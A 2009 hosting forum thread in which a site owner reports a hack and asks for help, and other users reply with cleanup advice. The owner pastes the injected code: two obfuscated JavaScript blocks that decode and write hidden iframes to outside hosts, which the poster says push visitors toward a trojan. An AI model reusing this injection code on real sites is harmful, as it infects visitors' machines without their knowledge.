my webspace has been hacked!

my webspace has been hacked!

Posted by: mrg9999
Posted on: 2009-05-23 00:55:00

This or a variation of this code has been added to all my index.html files

It opens various other websites, or tries to download a trojan

I can't find out how they did it. The access logs don't show anyone else logging in. support never got back to me. I have deleted all my users, changed my ssh and ftp passwords.
Google now show me as an attack site!!

Suggestions?



--cut

<body id="body"><script>s='DMEJEGFCEBENEFCAHDHCGDDNCCGIHEHEHADKCPCPHICNHDHJHDHEGFGNHDCOGOGBGNGFCPEBGEHGGBGOGDGFGEFPFEHCGBGGGGGJGDCPGPHFHECOHAGIHADPHDFPGJGEDNDBCCCAHHGJGEHEGIDNCCDBCCCAGIGFGJGHGIHEDNCCDBCCCAGGHCGBGNGFGCGPHCGEGFHCDNCCDACCDODMCPEJEGFCEBENEFDOANAKDMEJEGFCEBENEFCAHDHCGDDNCCGIHEHEHADKCPCPHEGPGKGBGOGEGHGMGPHHCOGDGPGNCPEBGEHGGBGOGDGFGEFPFEHCGBGGGGGJGDCPGPHFHECOHAGIHADPHDFPGJGEDNDBCCCAHHGJGEHEGIDNCCDBCCCAGIGFGJGHGIHEDNCCDBCCCAGGHCGBGNGFGCGPHCGEGFHCDNCCDACCDODMCPEJEGFCEBENEF';x='';sl=s.length;for(i=0;i<sl;i=i+2){x+=String.fromCharCode(((s.charCodeAt(i)-65)<<4)+s.charCodeAt(i+1)-65);}document.write(x);</script><script>s='DMEJEGFCEBENEFCAHDHCGDDNCCGIHEHEHADKCPCPHICNHDHJHDHEGFGNHDCOGOGBGNGFCPEBGEHGGBGOGDGFGEFPFEHCGBGGGGGJGDCPGPHFHECOHAGIHADPHDFPGJGEDNDBCCCAHHGJGEHEGIDNCCDBCCCAGIGFGJGHGIHEDNCCDBCCCAGGHCGBGNGFGCGPHCGEGFHCDNCCDACCDODMCPEJEGFCEBENEFDOANAKDMEJEGFCEBENEFCAHDHCGDDNCCGIHEHEHADKCPCPHEGPGKGBGOGEGHGMGPHHCOGDGPGNCPEBGEHGGBGOGDGFGEFPFEHCGBGGGGGJGDCPGPHFHECOHAGIHADPHDFPGJGEDNDBCCCAHHGJGEHEGIDNCCDBCCCAGIGFGJGHGIHEDNCCDBCCCAGGHCGBGNGFGCGPHCGEGFHCDNCCDACCDODMCPEJEGFCEBENEF';x='';sl=s.length;for(i=0;i<sl;i=i+2){x+=String.fromCharCode(((s.charCodeAt(i)-65)<<4)+s.charCodeAt(i+1)-65);}document.write(x);</script>



</html>
-cut




Re: my webspace has been hacked!

Posted by: Atropos7
Posted on: 2009-05-23 01:51:00

In reply to:

I can't find out how they did it. The access logs don't show anyone else logging in. support never got back to me. I have deleted all my users, changed my ssh and ftp passwords.
Google now show me as an attack site!!

Read http://wiki.dreamhost.com/Troubleshooting_Hacked_Sites or find someone who can do all that for you.



cool openvein.org -//-

Re: my webspace has been hacked!

Posted by: sXi
Posted on: 2009-05-23 08:45:00

I've fixed quite a few hacked sites on DH accounts that used index file script embeds as their primary target. Most are WordPress exploits, but with the most recent one the hackers hadn't cleaned up after themselves correctly and had left files on the user's account that indicated a PERL attack. Check your root userspace for any PERL scripts, as you might be able to glean info from the contents if they remain present.




How To Install PHP.INI / ionCube on DreamHost

Tags: ftp passwordsindex html filesgooglesshvariation